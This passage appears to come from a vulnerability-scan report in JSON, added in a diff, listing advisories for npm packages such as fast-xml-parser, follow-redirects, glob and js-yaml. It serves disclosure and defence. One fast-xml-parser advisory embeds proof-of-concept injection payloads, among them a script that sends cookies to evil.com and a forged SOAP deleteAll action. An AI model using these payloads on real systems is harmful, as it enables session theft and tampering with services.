"https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25896", + "https://www.cve.org/CVERecord?id=CVE-2026-25896" + ], + "PublishedDate": "2026-02-20T21:19:27.47Z", + "LastModifiedDate": "2026-03-02T14:54:02.76Z" + }, + { + "VulnerabilityID": "CVE-2026-26278", + "VendorIDs": [ + "GHSA-jmr7-xgp7-cmfj" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "4.5.4, 5.3.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26278", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2b50a6e13429ef49bfc019908ac1dbaf1fbda4893c39d12fd88e719de8c06b54", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26278", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26278", + "https://www.cve.org/CVERecord?id=CVE-2026-26278" + ], + "PublishedDate": "2026-02-19T20:25:43.717Z", + "LastModifiedDate": "2026-02-23T19:30:26.017Z" + }, + { + "VulnerabilityID": "CVE-2026-33036", + "VendorIDs": [ + "GHSA-8gc5-j5rx-235r" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.5.6, 4.5.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33036", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4b38304d06443d93ae4a4a205d6b78f4ca6e4d264fcd0aec2f2fae4aafbc14b8", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass", + "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (\u0026#NNN;, \u0026#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like \u0026#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33036", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5", + "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33036", + "https://www.cve.org/CVERecord?id=CVE-2026-33036" + ], + "PublishedDate": "2026-03-20T06:16:11.63Z", + "LastModifiedDate": "2026-03-23T16:28:10.93Z" + }, + { + "VulnerabilityID": "CVE-2026-33349", + "VendorIDs": [ + "GHSA-jp2q-39xq-3w4g" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "4.5.5, 5.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33349", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:dcc4b62656f02e435a97091ee7c8a8d634164d29661b4d8430758273dacf882f", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unbounded entity expansion due to incorrect configuration limit handling", + "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1284" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33349", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33349", + "https://www.cve.org/CVERecord?id=CVE-2026-33349" + ], + "PublishedDate": "2026-03-24T20:16:29.407Z", + "LastModifiedDate": "2026-03-26T13:01:52.857Z" + }, + { + "VulnerabilityID": "CVE-2026-41650", + "VendorIDs": [ + "GHSA-gh4j-gqv2-49f6" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.7.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41650", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:311efcd5e8a0e072ca02fcad55dc70800cf59415ae40191567ef14181417da08", + "Title": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters", + "Description": "# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters\n\n## Summary\n\nfast-xml-parser XMLBuilder does not escape the `--\u003e` sequence in comment content or the `]]\u003e` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.\n\nExisting CVEs for fast-xml-parser cover different issues:\n- CVE-2023-26920: Prototype pollution (parser)\n- CVE-2023-34104: ReDoS (parser)\n- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder\n- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities\n\nThis finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.\n\n## Vulnerable Code\n\n**File**: `src/fxb.js`\n\n```javascript\n// Line 442 - Comment building with NO escaping of --\u003e\nbuildTextValNode(val, key, attrStr, level) {\n // ...\n if (key === this.options.commentPropName) {\n return this.indentate(level) + `\u003c!--${val}--\u003e` + this.newLine; // VULNERABLE\n }\n // ...\n if (key === this.options.cdataPropName) {\n return this.indentate(level) + `\u003c![CDATA[${val}]]\u003e` + this.newLine; // VULNERABLE\n }\n}\n```\n\nCompare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`.\n\n## Proof of Concept\n\n### Test 1: Comment Injection (XSS in SVG/HTML context)\n\n```javascript\nimport { XMLBuilder } from 'fast-xml-parser';\n\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst xml = {\n root: {\n \"#comment\": \"--\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!--\",\n data: \"legitimate content\"\n }\n};\n\nconsole.log(builder.build(xml));\n```\n\n**Output**:\n```xml\n\u003croot\u003e\n \u003c!----\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!----\u003e\n \u003cdata\u003elegitimate content\u003c/data\u003e\n\u003c/root\u003e\n```\n\n### Test 2: CDATA Injection (RSS feed)\n\n```javascript\nconst builder = new XMLBuilder({\n cdataPropName: \"#cdata\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst rss = {\n rss: { channel: { item: {\n title: \"Article\",\n description: {\n \"#cdata\": \"Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more\"\n }\n }}}\n};\n\nconsole.log(builder.build(rss));\n```\n\n**Output**:\n```xml\n\u003crss\u003e\n \u003cchannel\u003e\n \u003citem\u003e\n \u003ctitle\u003eArticle\u003c/title\u003e\n \u003cdescription\u003e\n \u003c![CDATA[Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more]]\u003e\n \u003c/description\u003e\n \u003c/item\u003e\n \u003c/channel\u003e\n\u003c/rss\u003e\n```\n\n### Test 3: SOAP Message Injection\n\n```javascript\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true\n});\n\nconst soap = {\n \"soap:Envelope\": {\n \"soap:Body\": {\n \"#comment\": \"Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!--\",\n Action: \"getBalance\",\n UserId: \"12345\"\n }\n }\n};\n\nconsole.log(builder.build(soap));\n```\n\n**Output**:\n```xml\n\u003csoap:Envelope\u003e\n \u003csoap:Body\u003e\n \u003c!--Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!----\u003e\n \u003cAction\u003egetBalance\u003c/Action\u003e\n \u003cUserId\u003e12345\u003c/UserId\u003e\n \u003c/soap:Body\u003e\n\u003c/soap:Envelope\u003e\n```\n\nThe injected `\u003cAction\u003edeleteAll\u003c/Action\u003e` appears as a real SOAP action element.\n\n## Tested Output\n\nAll tests run on Node.js v22, fast-xml-parser v5.5.12:\n\n```\n1. COMMENT INJECTION:\n Injection successful: true\n\n2. CDATA INJECTION (RSS feed scenario):\n Injection successful: true\n\n4. Round-trip test:\n Injection present: true\n\n5. SOAP MESSAGE INJECTION:\n Contains injected Action: true\n```\n\n## Impact\n\nAn attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:\n\n1. **XSS**: Inject `\u003cscript\u003e` tags into XML/SVG/HTML documents served to browsers\n2. **SOAP injection**: Modify SOAP message structure by injecting XML elements\n3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout\n4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context\n\nThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).\n\n## Suggested Fix\n\nEscape delimiters in comment and CDATA content:\n\n```javascript\n// For comments: replace -- with escaped equivalent\nif (key === this.options.commentPropName) {\n const safeVal = String(val).replace(/--/g, '\u0026#45;\u0026#45;');\n return this.indentate(level) + `\u003c!--${safeVal}--\u003e` + this.newLine;\n}\n\n// For CDATA: split on ]]\u003e and rejoin with separate CDATA sections\nif (key === this.options.cdataPropName) {\n const safeVal = String(val).replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e');\n return this.indentate(level) + `\u003c![CDATA[${safeVal}]]\u003e` + this.newLine;\n}\n```", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6" + ] + }, + { + "VulnerabilityID": "CVE-2026-27942", + "VendorIDs": [ + "GHSA-fj3w-jwp8-x2g3" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.3.8, 4.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27942", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1d8578cae5f321b2f2f581249be445763781100492345df63a4203e451c93515", + "Title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder.", + "Severity": "LOW", + "CweIDs": [ + "CWE-120" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", + "V40Score": 2.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27942", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a", + "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27942", + "https://www.cve.org/CVERecord?id=CVE-2026-27942" + ], + "PublishedDate": "2026-02-26T02:16:22.357Z", + "LastModifiedDate": "2026-03-02T14:54:48.08Z" + }, + { + "VulnerabilityID": "GHSA-r4q5-vmmm-2653", + "PkgID": "follow-redirects@1.15.11", + "PkgName": "follow-redirects", + "PkgIdentifier": { + "PURL": "pkg:npm/follow-redirects@1.15.11", + "UID": "7f24cc7faa596a4d" + }, + "InstalledVersion": "1.15.11", + "FixedVersion": "1.16.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-r4q5-vmmm-2653", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:184ff9c48871b10e88baed7392f316651c08b3fcf01e2f78cbba175892825505", + "Title": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets", + "Description": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol \u0026\u0026\n redirectUrl.protocol !== \"https:\" ||\n redirectUrl.host !== currentHost \u0026\u0026\n !isSubdomain(redirectUrl.host, currentHost)) {\n removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.9 + } + }, + "References": [ + "https://github.com/follow-redirects/follow-redirects", + "https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9", + "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653" + ], + "PublishedDate": "2026-04-14T01:11:11Z", + "LastModifiedDate": "2026-04-14T01:11:11Z" + }, + { + "VulnerabilityID": "CVE-2025-64756", + "VendorIDs": [ + "GHSA-5j98-mcp5-4vw2" + ], + "PkgID": "glob@10.4.5", + "PkgName": "glob", + "PkgIdentifier": { + "PURL": "pkg:npm/glob@10.4.5", + "UID": "9116516bc1102054" + }, + "InstalledVersion": "10.4.5", + "FixedVersion": "11.1.0, 10.5.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bb3f26fca2b8118cd4c3345e2e4b418d2caac6427b657646354bdd6deba0869a", + "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", + "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-78" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64756", + "https://github.com/isaacs/node-glob", + "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", + "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", + "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", + "https://www.cve.org/CVERecord?id=CVE-2025-64756" + ], + "PublishedDate": "2025-11-17T18:15:58.27Z", + "LastModifiedDate": "2025-12-02T19:34:43.27Z" + }, + { + "VulnerabilityID": "CVE-2025-64756", + "VendorIDs": [ + "GHSA-5j98-mcp5-4vw2" + ], + "PkgID": "glob@11.0.3", + "PkgName": "glob", + "PkgIdentifier": { + "PURL": "pkg:npm/glob@11.0.3", + "UID": "fc64b08e36648e84" + }, + "InstalledVersion": "11.0.3", + "FixedVersion": "11.1.0, 10.5.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5e5ccaee0d7775306cf535c42d67a03a1c210eab272210dacb3d72ff86eb44d6", + "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", + "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-78" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64756", + "https://github.com/isaacs/node-glob", + "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", + "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", + "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", + "https://www.cve.org/CVERecord?id=CVE-2025-64756" + ], + "PublishedDate": "2025-11-17T18:15:58.27Z", + "LastModifiedDate": "2025-12-02T19:34:43.27Z" + }, + { + "VulnerabilityID": "CVE-2025-64718", + "VendorIDs": [ + "GHSA-mh29-5h37-fv8m" + ], + "PkgID": "js-yaml@3.14.1", + "PkgName": "js-yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/js-yaml@3.14.1", + "UID": "7dfa3f9a3b4da359" + }, + "InstalledVersion": "3.14.1", + "FixedVersion": "4.1.1, 3.14.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e09191a37091e8b36407e26111430486ce4a0b66f6c409dc28366e22c921c7bd", + "Title": "js-yaml: js-yaml prototype pollution in merge", + "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64718", + "https://github.com/advisories/GHSA-mh29-5h37-fv8m", + "https://github.com/nodeca/js-yaml", + "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", + "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", + "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", + "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", + "https://www.cve.org/CVERecord?id=CVE-2025-64718" + ], + "PublishedDate": "2025-11-13T16:15:57.153Z", + "LastModifiedDate": "2026-02-02T12:54:45.34Z" + }, + { + "VulnerabilityID": "CVE-2025-64718", + "VendorIDs": [ + "GHSA-mh29-5h37-fv8m" + ], + "PkgID": "js-yaml@4.1.0", + "PkgName": "js-yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/js-yaml@4.1.0", + "UID": "d8116734d3e150a5" + }, + "InstalledVersion": "4.1.0", + "FixedVersion": "4.1.1, 3.14.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:790181d288a81c9ead05601c3273757b0fbe9948b388b122dda1711ef860fb9f", + "Title": "js-yaml: js-yaml prototype pollution in merge", + "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64718", + "https://github.com/advisories/GHSA-mh29-5h37-fv8m", + "https://github.com/nodeca/js-yaml", + "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", + "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", + "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", + "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", + "https://www.cve.org/CVERecord?id=CVE-2025-64718" + ], + "PublishedDate": "2025-11-13T16:15:57.153Z", + "LastModifiedDate": "2026-02-02T12:54:45.34Z" + }, + { + "VulnerabilityID": "CVE-2026-4800", + "VendorIDs": [ + "GHSA-r5fr-rjxr-66jc" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + "PkgIdentifier": { + "PURL": 